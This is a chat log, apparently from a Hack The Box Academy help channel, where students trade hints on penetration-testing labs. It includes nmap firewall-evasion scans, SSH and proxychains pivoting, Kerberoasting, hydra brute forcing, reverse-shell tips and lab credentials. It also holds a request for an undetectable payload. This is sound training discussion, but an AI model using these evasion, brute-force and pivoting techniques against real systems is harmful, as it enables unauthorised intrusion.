soooo I'm really lost in this module. Like the concept are dead easy, whyyyyy would that be a struggle like this to get the questions haha

I would assume like the other modules if you review it, it should steer you in the right direction.

Take a break, it helps

I am facing this issue when try to login to MySQL

probably have to allow for a self signed cert

what that means?

i don't know about this

yeah idk, just guessing, i don't know that much about the mysql command specifically

Can anyone help me with the Secure Coding 101 Assessment "On '/Reverse' you will find an obfuscated JavaScript code, but it appears to be broken, and doesn't return the flag! Try to reverse it to understand how it should be working, and fix it to get the flag." ,please?

I deobfuscated the code already, however I'm still struggling to identify the key.

Thank you in advance!

Alright!

My brain is so fried with the Password Attacks module

Did it DOS itself?

Nah bro, I'm just confused on how the attack worked

Any hints to solve "Enumerate the custom script that is running on the system and submit its output as the answer." this questoin in snmp enumeration stuck for long time in this question

review the data you've gathered

Am Newie at https://academy.hackthebox.com/module/77/section/726 question 3. Have

Welcome, as you’re new, please, if you’re asking for help, mention the module and section you need help with. That way more people will help.

Hi EverydaySparkling. Thnx for guidance. I copied a n other and put up the link which shows the module and section. I guess its better to say module is getting started section is service scanning

Thing is with clicking the link, if I am on my mobile, it will open it in discord browser and I will have to login again

and then I am just like, nope, too much effort 🙂

and I am sure other people have the same 😅

Good to Know ! Much to learn bout Discord aswell !!👍 😆

what issue are you having?

were you able to download the flag?

Just want to know where the flag.txt file gets downloaded to ??

the current directory you're having your shell in

anyone please help me, I'm stuck at 'DNS Tunneling with Dnscat2' (Pivoting, Tunneling, and Port Forwarding)

Not quite sure what that means. Have checked download folder in the Pwnbox. It's Empty

When you open a shell, it will be running from a certain directory

you can find the current directory by running the pwd command

OK. I will go explore further. Thnx

ping me if you need any more help 🙂

I got "./dnscat --secret" but not able to import it

what error you getting?

I connected with xfreeRDP on htb-student and tryng next step but not working

If you're connected with rdp, are you running it from powershell and running the command exactly as explained in the section?

Hello can someone help me pls

Attacking Common Applications - Skills Assessment I
Exploit the application to obtain a shell and submit the contents of the flag.txt file on the Administrator desktop.

I found website_backup in ftp but I dont have acces to get then I found vuln apache tomcat and I find exploits but there are not worked

PS C:\Users\htb-student> Import-Module .\dnscat2.ps1
Import-Module : The specified module '.\dnscat2.ps1' was not loaded because no valid module file was found in any
module directory.
At line:1 char:1

• Import-Module .\dnscat2.ps1

•   + CategoryInfo          : ResourceUnavailable: (.\dnscat2.ps1:String) [Import-Module], FileNotFoundException
    + FullyQualifiedErrorId : Modules_ModuleNotFound,Microsoft.PowerShell.Commands.ImportModuleCommand

Still lost on this. I have the following: smb: \flag> get flag.txt
getting file \flag\flag.txt of size 33 as flag.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \flag>
Then what do I do to access the folder called 'flag' and submit the contents of the flag.txt file.

use cat command

┌─[eu-academy-3]─[10.10.14.146]─[htb-ac-1306913@htb-blbcwp3sp7]─[~/dnscat2/server]
└──╼ [★]$ ls
controller dnscat2-powershell dnscat2.rb Dockerfile drivers Gemfile Gemfile.lock libs tunnel_drivers
but it is there

Thnx TLattice 👍 Can you illustrate with example cat command plse

Any hints to solve "Enumerate the custom script that is running on the system and submit its output as the answer." this questoin in snmp enumeration stuck for long time in this question
used every thing nmap script snmpwalk braa but still not getting it

cat <file>

sounds like you still need to upload the ps1 to the target

yes

i suggest doing the linux fundamentals module if you haven't already @dusk haven

should be like cat flag/flag.txt

but yes, follow linux fundamentals like TLattice said

not able to import .\dnscat2.ps1

you sure its there?

show me

as its a tier2 , feel free to dm me

will reply in 10 minutes, gotta do something first

Sounds like a good idea !!

This is what I get smb: \flag> cat flag.txt
cat: command not found
smb: \flag>

you need to exit this tool first

Ah Hah !!

Yay !! Whoop whoop whoop Thnk U and signing off !!

great job 🙂

same. currently doing it.

need some help with the icmp tunneling with socks section of pivoting tunneling and port forwarding module, cant seem to get nmap to work with proxychains

anyone free to dm

ayy, wanna do the path together?

https://academy.hackthebox.com/module/191/section/2062

Is two empty lines actually required. Empty body, Content-Length is not given. just one new line is enough I guess

Hello. Ive problem in SHELLS & PAYLOADS : The Live Engagement

I can not find any wroking browser on the machine that ive connected with rdp. Is it normal ??

why you need browser on the machine that you rdped into it ?

you can use you own browser , then copy paste anything you need

but i can not connect to host 1 on my own browser

No

But firefox exists on the jump host (10.129.x.x)

Type firefox in the terminal of the jump host

welcome back marcie 🙂

ahoy, it is marcielee

Yes i'ts needed to trick the proxy believing it's another request (from what I remember)

@naive sage here use this

*use these

it's still taking long time lolz

stuck here

no it's this because these would imply that you have sent multiple mesages but it's all contained in one codeblock

yeah it will take a bit, it's compiling and installing the runtime

Oh gotcha.

skill issue

Real

DMed u

Anyone for a nudge on the HTTP Attacks Skills Assessment?
I'm able to perform a TE.CL from TE.TE and from Gunicorn but still the second request gets picked by the waf.... don't know if I have to double encode the blacklisted characters or what

are you familiar with wcvs tool?

A bit... Used on the other HTTP module

yeah

misconfiguration one

i am getting issue at word list can you help me?

./go/bin/Web-Cache-Vulnerability-Scanner -u http://94.237.54.170:56841/ -sp language=en -gr
WCVS v1.0.0 started at 2024-10-03_14-01-29
Exported report ./2024-10-03_14-01-29_WCVS_Report.json
wordlists/headers: open wordlists/headers: no such file or directory

Did you install it via go? Try the same steps as the module.
Go to the releases link in the GitHub Repo, download the zip file and decompress it.
It will have a wordlist folder in it

okay

is using crackmapexec module worth it? considering everyone is using nxc now

it's the same syntax, so yes

ty

Im on "Introduction to python3" "the first iterations" and i have a question going: What is the 3rd most used word on the exercise target website? but for some reason i cannot access that Target ip neither from my device nor the pwnbox. Does someone have an Idea what i might be doing wrong?

check your vpn

I am connected but i still cannot access it. I tried to both ping it and use the pre existing code but neither work.

Bill Gates report on HTB Academy for the Login Brute Forcing module?

you don't need to use vpn, it's a docker target, just connect to the ip and port given

I just asked Copilot it seems like a line of code just was wrong i managed to do it now. Thx tho

Module: Attacking Authentication Mechanisms
Section: Skills Assessment
Can I ping someone for a quick hint? I||'m pretty sure that I need to use the jwk exploit but the application doesn't seem to arbitrary certificate / public key. thanks||

Just finished 'Using Crackmapexec' module. I didnt see here people who did finish it, so if anyone is stuck in the skills assessments i'm available for help.

Does anyone knw in the windows priv esc module situational awareness section how to find out what executable other than cmd.exe is blocked by app locker

Ok I'm back at it and I need help :p

The new Bruteforce login module, Skill assessment part I.
We're given a username list and a password list.
I don't see anything in the (very short) assessment description/question that leads me to anything else but feeding these to hydra to bruteforce the basic auth login of the target.

Problem: that is HUGE and would take 12 to 24h depending on network speed apparently...

Question: wtf 😄 What am I missing, or should I actually go through the whole cutting one word list in pieces, and fork hydra so that it can be achieved in the 90min lifetime of the target? Any help appreciated 🙂

use the chunked rockyou-*.txt (rockyou-25, -50, -75, etc.) i think you'll be able to cut your cracking time down with that

Hey any help here

Does anyone knw in the windows priv esc module situational awareness section how to find out what executable other than cmd.exe is blocked by app locker

Even though they give a very clear wordlist ?
2023-200_most_used_passwords.txt

Btw it's kind of interesting that the wordlist named "200 most used password" has 2611 lines... Am I missing something there haha

oh right, use that one then

shouldnt take too long

12-24h 😄 But now I am wondering if there is not an issue with that wordlist being way over the 200 lines it should have according to its name :p

YES ok, I must have really messed up with the wordlist somehow

I will download it again, mine was WAY too big

Hey guys,
I am currently trying to answer the last question from this Section:

INFORMATION GATHERING - WEB EDITION
Utilising WHOIS

"What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?"

I couldn't see that information with whois, so I decided to take a look on their bug bounty program.
But the address that is given there (starts with vulnerability...) does not solve the question.

Could you give me a small hint?
I think I am missing something here.

holy hell taking a break makes a world of a difference

yesterday i was doing a lab and i found a file that i spent like 2 hours figuring out what to do with and then i decided to call it quits for the night, it turns out it was a red herring and i logged on this morning and figured it out in about 5 minutes

whois gives you the information, you just have to look harder

or use grep if you don't want to read all of that

thanks i will try it again

Hey, need some help with the module Network Enumeration with Nmap, the hard lab.
Even when I go to http://<ip>/status.php the alerts go to 50-60 out of 75 without me doing anything...
Every subtle NMAP enumeration after sometime bans me by the IPS.

I have used the whois command from the busybox nix package. It does not show all of the available information. Installing the whois nix package directly and using that shows the information that i needed.
-> It appears that there are differences in the packages.
thanks breadgirljane, it really was there.

Im stuck in a Skills Assessment Challenge in Intro to windows command line. Anyway i can get help here?

you can just state your concern @topaz plinth someone here would answer it

do something like whois example.com | grep "email"

its there, just grep for it

whats your full nmap cmd you're using?

Im on the 5th question " User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them."
and ive tried almost every command i can fathom and im just not able to see the contents of the files. I can see the tree but the files in the tree.

findstr

you need to use the get-childitem cmdlet to parse thru the dirs for the flag. or maybe the find or findstr

try use 'Get-AppLockerPolicy' based powershell command. I will leave it to you to complete, if you really got stuck i will give you the full command.

sudo nmap 10.129.17.124 -F --script banner -Pn -n --disable-arp-ping --packet-trace --source-port 53 -T 1
Currently I'm running this scan for like 20 min and nothing detected me
sometimes im pinging the machine or doing a curl to /status.php to see how many alerts detected me

uhhhh who do i message if my account has been completely messed up

failing this scan you're running try utilizing the -T X option to adjust your timing and try to avoid the IDS/IPS

Yeah, but currently it didn't detect me

also you're using the -F for fast scan im not sure if that merely limits the number of ports or scans more aggressively (ie: more suspicious to IPS) or both. you'll know soon enough i reckon though

if you're attempting to evade IDS/IPS then the "lesson" in the exercise would be regarding the -T option

-F is for top 100 ports

so if you get lucky here with your scan, move on if you want but know that the -T option is where you wanna be for evasion

I'm using -T

oops i didnt catch that

yeah you should be succesful here

But its so slowww

plenty of ingredients in the cake on that cmd

I think the problem was when the machine first initialized, because when i checked <ip>/status.php it was showing 50 alerts out of 75
and after the ban was expired the number of alerts was resetting back down to 0 and now it works

neither of these commands displayed anything.

can you show your cmd? how you're using them?

Yeah 😅

you need to check the man page for those cmds to see how they're used you cant just type them in, they require args to return results

i believe that is touched on in the modules, to some extent. if memory serves me correctly

ok so try the ... | findstr HTB* (or whatever the flag convention is) you've identified the files with gci now find the str inside it

You are trying to pass a PowerShell cmdlet in CMD. It won't work that way

ah, didnt catch that

Either pass it as an argument to powershell

but situation remains the same, you know the files, you need to findstr them, gci is good for finding the files, then findstr for the flag contets

findstr should have a recurse cmd, or create a loop

apologies if this seems tough, i reckon you might be new to this, but these are essential workflows

||Get-ChildItem -Recurse -Filter *flag.txt | Get-Content||

In PowerShell

The flags for this module doesn't have the default HTB format

@topaz plinth not sure if this is self evident, but once you're in cmd.exe you need to launch powershell with a powershell.exe cmd, or just open powershell from start menu, then run the above cmd from b5null

It was his cmdlets to be honest 😂

Anyone for a couple of pointers in the HTTP Attacks Skills Assessment?
This thing is driving me insane

its a remote command prompt so it wont allow me to access a remote powershell

You will! Just type "powershell" and it will open up

Or powershell -Command "Your-PowerShell-Command"

This command got me nothing on the module Network Enumeration with NMAP under the hard lab

ost is up (0.078s latency).
Not shown: 98 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 3299.49 seconds

Any help would be appreciated.

were you able to finish this topic? This entire module is based on errors, I take more time troubleshooting instead doing the tasks.
I am stuck on dll errors (and yes, the real time protection is disabled and the folder listed as exception, just in case).

You are running a Fast scan. If I remember correctly this would only scan the 100 most popular ports.
You should strive to find a filtered high number port and then try to access it to find the flag.
The Evasion section will point out what you have to do

Hey guys anyone for this awnser? i already found it by looking for the default creds on internet but wanna know if there is a certain command? Its the password cracking module

@rustic sage please don’t post flags, even if they might be wrong 🙂

K sorry

Feel free to dm me 🙂

It doesn’t mention about which ports to scan
Should I scan all the ports?

i tried to use this command and this is what i got

just want to know if the point of this question was to find the default creds on internet or to use a certain command ^^

You can try the stuff in the evasion section and it should be listed in your results
Also change the flag to perform one of the half scans like an ACK or a FIN

Do you pay extra for the HTB labs (monthly r so) after paying for the academy (Pentester path)?

Yes, they’re different platforms. But only if you want to play the retired content, want private instances or use pwnbox

More info here: https://www.hackthebox.com/hacker/pricing

Oh! I need more clarity, please. Doesn't the HTB academy subscription include machines to learn/practice with? I am not talking about the 20 free machines you get for a trial!

I am trying to use the Parrot terminal to practice what was illustrated in the modules, but I am not getting the same results as shown in the modules.

I am new to this and trying to figure things out. TY

No, academy doesn’t include the machines from the main platform

Both separate subscriptions 🙂

😩

Were you able to solve it?

I was not 😦

Go DM

This is what they got from the module I am on:

nmap -sC -sV -p21 10.129.42.253

Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-20 00:54 GMT
Nmap scan report for 10.129.42.253
Host is up (0.081s latency).

When I try to run the same command from the instance (my Workstation), it says the host is down

u connected to the VPN?

It shows on the top right corner that the VPN is running. No, I didn't connect to the VPN since I am running the instance straight from the workstation. I do not have the option to connect to VPN either.

so you working from your own VM or the pwn box?

pwn box

ok cool you dont have to connect to the vpn, and i just noticed, u can reach the host, it says host is up here

That was a copy of what was illustrated in the module that I was trying to replicate. I was running the same command on my pwn box but it was saying host is down

Hey I got a question, maybe someone can help me with. I'm doing the client side validation section in the File Upload attacks. I already got the flag by doing the Burp practice, but im trying to do it through the inspector portion and I've gotten to the command line portion. However, when I do the function file check. I get no response/output. Anyone know how to get it to produce output? I input the function and the file and get nothing

No one on the HTTP Attacks module?

Hey anyone knws answer to windows pr8v esc intial enumeration question 4 what user us logged into target host

I enterd net user and tried every name of user that i got but none worked any help

I am on the footprinting smb in the pentesters path and am down to the "find additional information about the specific share we found previously and submit the customized version of that specific share as the answer" question and I'm not understanding what it's asking for. Anyone help?

Anyone know what I'm doing wrong here? I'm just working along with the example but I'm not getting the same result

From the example, it's .\SilkETW.exe -t user -pn Microsoft-Windows-PowerShell -ot file -p ./etw_ps_logs.json -l verbose -y C:\Rules\yara -yo Matches

The share you found in previous question, you need to find some additional information on it. a hint: crackmapexec can get you what you seek.

@opal nexus Ty

use 'query user'

Used it

Bro got a lost of users i tried none worked

You should get only one result. can you give a screenshot?

I used net user not query

Try 'query user' then

I got a user sccm_svc

Enterd it but that isnt it

I ran that but I still don't understand what I'm looking for. Is it a customized file name, a new flag?

Make sure you don't enter spaces or something with the answer

The correct Crackmapexec command will list you the shares and their descriptions.

No spaces that was all fine but that isnt the user name i guess

Weird, It was for me and I think for everyone. You do talk about the ' What user is logged in to the target host?' question, right?

Yess

I got sccm_svc all small leters

I enterd that as the answer not working

Mm

Don’t share answers to questions

Same

For me but doesnt wrk

Well due to 0x56 instruction (I'm not sure if he is a moderator) or not I had to delete my screenshot, but maybe you should take it to technical support or something.

There was something wrond

I am not a moderator, but it is not allowed to post answers for modules here

Every time i enterd the correct answer and hit submit it showed me wrong answer then i simply out that usrr name there didnt click submit just hit mark complete and continue as i had all other answers correctly now i come back and look it looks like it registerd that answer

This was a glitch i think from htb side

Hello, I'm stuck on question 2 in the Pivoting, Tunneling, and Port Forwarding room. I captured the flag, but when I do a port scan with nmap on the target system, all ports are filtered and I cannot detect the rdp directly.

Question: Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.

https://academy.hackthebox.com/module/54/section/511
is this command true for this module??

how did you connect to the ssh, and configured the proxychains.conf?

@opal nexusssh -D 9050 ubuntu@10.129.202.64

Full screen it

And the proxychains.conf?

$ tail -4 /etc/proxychains.conf

meanwile

defaults set to "tor"

socks4 127.0.0.1 9050

You need to port scan with -sT

@safe starYes I use -sT

I restarted the machine and will try again

ok its all correct. I assume you use 'proxychains' before the scan. for good practice i recommend using sudo as well.

guys i'm doing web proxies and i'm using brup intruder to enum for .html in admin directory but it takes for ever is this normal ?

i think i will just use ffuf or gobuster to save time

Just use zap or ffuf if its something simple

@opal nexustyped sudo and it worked thanks

Also, burp community throttles the speed to 1 request a sec, so yes that’s normal

i really hoped that they provided short wordlist just to use instead of use a long one

Server-side Attacks

Skills Assessment

please help i dont get any post request i already crawl all the page

to be fair i was using wrong wordlist i didn't know that it had to be Seclists wordlist to work even so ffuf saves so much time

Practical Digital Forensics Scenario
Investigate the USN Journal located at "C:\Users\johndoe\Desktop\kapefiles\ntfs%5C%5C.%5CC%3A$Extend$UsnJrnl%3A$J" to determine how "advanced_ip_scanner.exe" was introduced to the compromised system. Enter the name of the associated process as your answer. Answer format: _.ex

Am I right to use Chainsaw to solve this task, or did I take a wrong turn somewhere?

finished but that skill assesment is trash

Kerberos Attacks - Kerberoasting from Linux - GetUserSPNs.py inlanefreight.local/pixis why the use the username pixis is you don't know any users?

or do you need to know at least one user?

ah nm you need to input a password. I was missed that

please dm me if you can help

Did you ever figure this out? Mine get stuck on listening on [any] 9443 ...

One message removed from a suspended account.

One message removed from a suspended account.

One message removed from a suspended account.

if I have a socat process running and executing let's say a server.py
how can i make socat terminate when child process (server.py) exits

do a script

no matter how i try it just won't exit
this is how i start the socat
socat -t 0 TCP-LISTEN:5050,reuseaddr,fork EXEC:"python3 server.py",pty,ctty

even if I sent a SIGTERM from the child process it still doesn't quit

SQL injection, is there any sort of setup to do on kali to get things working?

ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

Sounds like a CA issue?

hey guys do you think the google cyber security certificate is worth getting?

Is burp proxy on?

It is super macro-view of the industry, nearly nothing technical in it, but if you're new to cybersecurity (I was) it's a nice little 2-weeks course, won't give you headaches, teaches you about how things work in the industry

Nope

Where u getting that error?

@sick whale Flexible schedule
6 months, 7 hours a week
Learn at your own pace ---- it says 4-6 months to complete on here lol

Yeah 1 hour per day only though

2 weeks if you have some linux cmd basis already, and spend 4-5h per day

literally first connection haha

yeah ur right, thanks bro. i just dont want to watse my time and money on something thats useless but you say its helpful starting out so ill give it a shot

Well considering it's a monthly membership and I actually think you get the first month for free...

It's actually free haha

week free yes after its i think 50 a month

either way if its helpful ill try it out

┌──(&(㉿$%^$)-[~/htb/sqlinj]
└─$ mysql -h 94.237.54.103 -u root -p -P 46002
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

how do i get access to type in general i dont have permissions lmao

try restarting it, worked fine for me

okay thansk

Nope same

Must be some config on my side then

Tried sudo-ing it, doesn't change a thing, so it's not due to ownership of the CA

Raed and follow #welcome

yeah, not sure what the problem would be

does it work on pwnbox

Not tried yet, will do when I'm out of my meeting :p

Network services

Help I’m stuck on the network services section of the Linux fundamentals

mongodb doesnt work on mypwnbox

Naaahhhh, i ragequit. I tried it on kali, parrot nothing changed.

Hi, in Using CrackMapExec in the Vulnerability Scan Modules section and I've encountered a problem. The exercise states: 'Authenticate to 10.129.230.129 (ACADEMY-CME-VULNSCAN-WS01) with user "Administrator" and password "IpreferanewP@$$".' However, while I can't authenticate using CrackMapExec, I am able to do so with Evil-WinRM. What am I doing wrong?

--local-auth

Thxs, feel so dumb 🥲

More of a curiosity than anything, but why does searching the Dashboard for "setoolkit" and/or "blackeye.sh" not turn up anything? Seeing as though phishing is by far the most common means by which bad actors gain initial footholds, you'd think there'd be some modules dedicated to tools that make phishing easy to pentest against, but apparently not.

There are some boxes with phishing as attack vector though

Yeah, just not on the Academy ― we definitely need a module dedicated to it.

The only place where phishing is even briefly mentioned as far as the Academy goes is in one single section of the module I'm in right now, which is the XSS module. Tools like SET and BlackEye need more Academy attention.

Our phishing campaigns fall under the red team and their engagements. Phishing is not within scope for our pentesting assessments according to our ROEs; however every place is different.

dm the commands you're using, it worked for me no problem on pwnbox too

did u open the image directory

this might be a dumb question but what exactly makes a VM safer to run malicious code? like the VM is still running on my physical machine from a hypervisor. also i dont really get how network requests work. my VM isnt on the same subnet IP but doesnt its network traffic have to go through my machine to get to the internet?

Because running with in a VM provides a degree of separation from your host VM

Your VM could be on the same subnet yes, or it could go through NAT, which also possible to access the host network

But generally it's a matter of isolation

If your VM gets fucked, you can always stop it and revert

If your host gets fucked, it's a whole other number of steps to get back to trusting your system.

Me inside of Windows Active Directory Environment for the SOC Path

gotta love it when your "logon procedure is prohibited"

what enforces that isolation and stops data/code being written outside of the memory of the VM and instead ending up in the memory of my machine? which idek if thats possible, im still on cracking into HTB

Escaping from a guest to the host is certainly possible, and vulnerabilities have been around in the past

In the end, it's best effort

VMs are isolated from the host by the underlying virtualization features of your CPU / OS

If you want to go deeper, I'm not the person to speak to 😅

in the Windows Priv esc module where you are having to take advantage of vulnerable services, my POC shell.ps1 script isnt connecting to my NC listener. has anyone beaten this or could give me pointers?

Hey is anyone else stuck on "Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer."

I keep getting the answer 1197734

but it says it's wrong

On XSS § Phishing, how long did any of you have to wait for a response? Because I prepared a working payload, used test:test credentials with my own IP to make sure that it works, and it showed up in netcat and everything. Went to send.php to make sure it sends properly ― "URL Sent!" Kept netcat open, and... crickets.

didn't have to wait long at all

Anyone would know how to get rid of this error in Kali:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

Is there some specific modification of the configuration to do? mysql connects well on pwnbox.

(I'm in the SQL injection module but without access to the DB, it will prove... complicated 😄 )

try finding a parameter that ignores ssl or doesn't need it

hard to say without knowing which section you're on

or what tool you're using

im getting this error

SQL injection -> using mysql to connect to the DB. Literally the first dumb question to makke sure your environment is well set up :p well it is not haha

your error says what's wrong right there in your pic, Invoke-PowerShellTcp isn't a valid cmdlet. Did you import the script that uses it?

@cloud urchin no sorry, how do i do that?

I'm not finding a module "SQL Injection"

Import <file>

Sorry "SQL Injection Fundamentals"

is the exact name

@cloud urchin sorry stupid question, do i run that from the powershell enviroment on the victims box?

I have no idea what you're trying to do, what module/section, etc. I was just responding to your question about why you were getting that error

@cloud urchin im on the windows priv esc module, under the abusing vulnerable services section

What section?

Intro to MySQL

I mean the question is straightforward, the command too, and it works on pwnbox.

But somehow it throws this error in Kali, and I have not touched anything on mysql config or anything (nor do I have used it more than a couple of times on boxes)

Which tool are you using?

mysql

what's your command syntax

mysql -h 94.237.51.214 -u root -p -P 59607

which works fine on pwnbox

Yes, you're generally going to be running powershell scripts on the target you're trying to elevate privileges on

looks like you're missing a password

No, password is entered after to avoid having it in cleartext in bash_history

(just tried passing it together, same error btw)

so what command did you use

weird, that worked for me on kali

Update: Works in PwnBox, but doesn't work in the Arch/Garuda version of Netcat — weird.

👆 they use Arch

😅

(sorry, couldn't help myself)

i'm getting the same error trying it now too

It worked once and then didn't ?

Or it worked in the past and now doesn't?

i did the module a long time ago and it worked without that error in my notes

Soooo maybe that's not me 😄 ?

(This is my nightmare: That this happens during the exam oO )

Oh.. come on

SSL is required

i got it working by using --skip-ssl

but the server doesn't support

aye

Well Garuda is Arch-based but much easier to install (and more full-featured out of the box) than vanilla Arch.

Never tried Arch tbh

👆 they don't use Arch btw

hahaha ok, that was an easy fix.

But what's the logic: SSL is required, so "skip it" ? How is it required then?
I don't get it haha

Thanks @cloud urchin btw!

it's saying the command is requiring it, not the server

I guess newer mysql client versions default to an SSL connection

i think

The skip argument reverts to previous behaviour (non-ssl)

Aaaah ok, makes more sense.

Thanks!!

yeah sorry not sure then. i use kali and it worked. sounds like arch may have some other funky stuff going on i'm not familiar with it at all except i heard it was for masochists

@cloud urchin nvm i got it, thanks for the help

Garuda* but still valid points

maybe some firewall rule or something?

Come to think of it, since Garuda comes with the Fish shell by default — that could also be to blame.

Update: it was KFirewall after all. Had set it up for some unrelated reasons, and had to temporarily disable outright for this to work properly.

Wrong thread, nvm..

It should take a few secs

Yeah, hence the problem being my firewall that I had to temporarily disable for this to work properly, as stated above

Yeah I had to do that with my Linux host, couldn’t get reverse shells

Sticking to kali vm from now on

Curious if the custom HTB fork of Parrot actually has an ISO that one could download — would make this process much easier. Of course, just plain old Parrot VM could also suffice.

Reason for the inquiry about Parrot as a VM choice of course is that MATE > Xfce in terms of configurability. That being said, just spinning up a Parrot Docker container is also a possibility…

yup it's on their site

this is the direct link to download the iso https://bunny.deb.parrot.sh//parrot/iso/6.1/Parrot-security-6.1_amd64.iso

Yup, see it now: https://deb.parrot.sh/parrot/iso/6.1/Parrot-htb-6.1_amd64.iso

Sure thing; having a literal locally hosted PwnBox should fix every issue.

i have a question regarding active directory, more specifically Cross-Forest Kerberoasting. If we conducted the attack successfully and go the credentials (in this case for mssqlsvc in the "Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows" section) HOW do we use these credentials to access the other domain?

Would help to know that the account you're talking about is a default username. People are lazy when it comes to changing things most of the time.

If the account with a default username is an admin of one domain, it's likely to be an admin of multiple domains.

To elaborate: mssqlsvc is the account created automatically when a new instance of MSSQL Server is installed. So you're going to run into it quite often in the real world as a way into more than one domain.

assuming i got a non default username my real question is basically how do i access the OTHER domain with that account regardless if its default or not with the creds i obtained

The section of the module that mentions Rubeus provides some important clues. I'll have to review my command history to see how exactly I did it, but it has something to do with overlapping ACLs.

they mentioned Enter-PSSesion but this is for the admin password reuse. However, i tried using it against the other domain with the mssqlsvc creds and always got an error so i basically did an attack and got a password but without the ability to access or see what the other domain have

Alright, just remembered: recall from the Password Attacks module that there's a way to use a hash directly without cracking it…

I had to do a lot of reviewing of PA during my walkthrough of the skills assessment for that module, just a heads up. Having Password Attacks open in a separate browser tab is going to really help you.

i will try that along with enter-pssesion because i feel that the answer is here specially that i have the password in cleartext

UPDATE: it worked using evil-winrm i had to pivot through the network and run my credentials through evil-winrm but i had to get the other domain ip which i did by pinging the domain first from the windows machine. Also, its now working using crackmapexec

That's why Ligolo is your friend: https://youtu.be/qou7shRlX_s?si=J6l89mu3RBZXNfFX

Decided on an even better solution than a VM for this: a dual-boot.

Spare installed SSD to the rescue

Just for fun, I chose to literally reuse the same username from the Academy PwnBox on this local install

Is it just me or the machines aren't spawning rn lmao

I was gonna do that, but I always end up getting a new kali machine

Is it stuck on spawning

yeah lol

for like an hour already

I think you gotta use ctrl+shift+r or spawn another machine so it kills that one

I already did so many times

let me try it again and wait

Yup I finished it

The only problem is the refresh rate. I cannot for the life of me figure out how to get it higher than 30Hz on my 4K display. With Plasma 6, that's no problem, but with MATE, it's next to impossible without needing to jump through some serious hoops.

Even adding "i915.modeset=1" to my kernel parameters did nothing to improve this.

Hi all, quick question on DACL2, we're provided with SharpHound collectors on the Windows box but not Bloodhound. Do we need to transfer the sharphound zip archive onto the pwnbox then? If yes how?

yes, using file transfer methods, smb/HTTP etc

Thanks for confirming!

how did you guys learn the basics of cyber

Just did Tryhackme and getting destroyed in ctfs

@safe star does tryhackme and hack the box give me the info necessary to complete certs like comptia

or would i have to expand

Yeah, more than enough, but you can just watch a course and memorize terms for those exams

Htb and THM help tho

@safe star stupid question but what do you mean by course for the exams like what kind of course

Just a CompTIA course on Udemy or youtube

Fixing this required manually editing xorg.conf. To save others the trouble, should they ever decide they too want a PwnBox clone on their system:

Section "Monitor"
   Identifier    "Monitor0"
   HorizSync      30.0 - 135.0       
   VertRefresh    56.0 - 61.0
   Modeline      "3840x2160R"  533.00  3840 3888 3920 4000  2160 2163 2168 2222 +hsync -vsync
   Option        "Primary" "true"
EndSection

Section "Device"
   Identifier   "RocketLake-S"
   Driver       "intel"               
   Option       "UseEdidFreqs" "false"
   Option       "ModeDebug" "true"
EndSection

Wish this could be easier, but alas, it is what it is.

for cpts should i even take notes or should i learn go thr ueach module and fully understand it and then go back t othe academy when i need help for cpts?

bcos the notes are already on the website wats th epoint in making notes when it there u kno

I suggest taking notes, it becomes very annoying having to click the modules, wait for them to load, then look for certain things many times.

Plus notes help you understand topics in your own words

Hello, I need a help on Attacking common applications - Joomla - Discovery & Enumeration : I spend my hours for bruteforce the admin password but it cant find ( I used rockyou.txt ) what can i do for that
do I really need to spend my days for finish to try whole wordlist?
or I am in the wrong way

Hello, im doing Windows Privilege Escalation Skills Assessment - Part II and im on question 2 trying to escalate privileges to SYSTEM. I got a shell using msfvenom but is not nt system and also I tried adding a user to the admin group it didnt work.

You might want to read the section again

ur doing the || MSI || thing right?

ty bro

i see the problem

and find the password

now I did and it worked thx

if i'm enrolled as a student and certain tier II module is done in 80% and then I upgrade to platinum, will this module be locked up AND zeroed?

because I'm not sure about second part

No

thanks

It should just stick with 80%

but i beleive it will be locked, right?

he would need to unlock it with cubes, but continue from where he left off

hello dude, i need help with Attacking DNS module.
DM me pls

attacking DNS module?

I am not 100% sure about the locking up bit, I would suggest to ask support indeed

yay

ig its better yeah

u mean section related to DNS probably, whats the module name?

attacking DNS, part of CPTS

i mean, attacking common services - attacking DNS section

yeah see thats what i meant, the module is attacking common services 😂

ups 😐

ok lemme see DMs

Hey, i'm stuck on Firewall and IDS/IPS Evasion - Hard Lab in module Network Enumeration with NMAP
This is the question
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
I've found the ports ||22,80,50000||, and the 3rd port running ||ibm-db2||.
Is it like a ctf, should I connect to the service? or what? this whole lab is a bit confusing me..
The command im running ||sudo nmap -p50000 -sV -v -Pn -n -g 53 10.129.56.157||

You can DM if you want a nudge

how to make an undetecable payload

can anyone tell us

Still!? Do exactly what the Evasion section does.
Now that you found the port, connect to it spoofing your own port to a important service that would rarely be blocked by firewall

thanks

i was a bit confused 😥
but after finished i understood what was missing

Guys hello, i am currentl at Attacking Common Applications - Skills Assessment I, i managet to list the contents of the Adminstrator Desktop (dir) but when am trying to get the flag i cant get it i tryied many ways (type, more, echo, less)

Hey guys any idea?

why doesn' tit work? what's the error

can not connect

is it bcs it was a local db?

myabe i am on the wrong path for exploiting this

make sure you can connect manually before using hydra

spoilers, make sure to use the full path

okej need to take a look again bcs i saw that port 3308 was not open

sorry for that, i do use the full path, C:\full\path\to\flag

so here ther is nothing, they said to connect to the target and find the credentials, im on the target know, is there a certain command where i can find the mysql credentials?

try passing the commands into cmd like
cmd /c whoami
make sure to use full path of cmd as well

thank i will try

but you might want to create a revshell with it

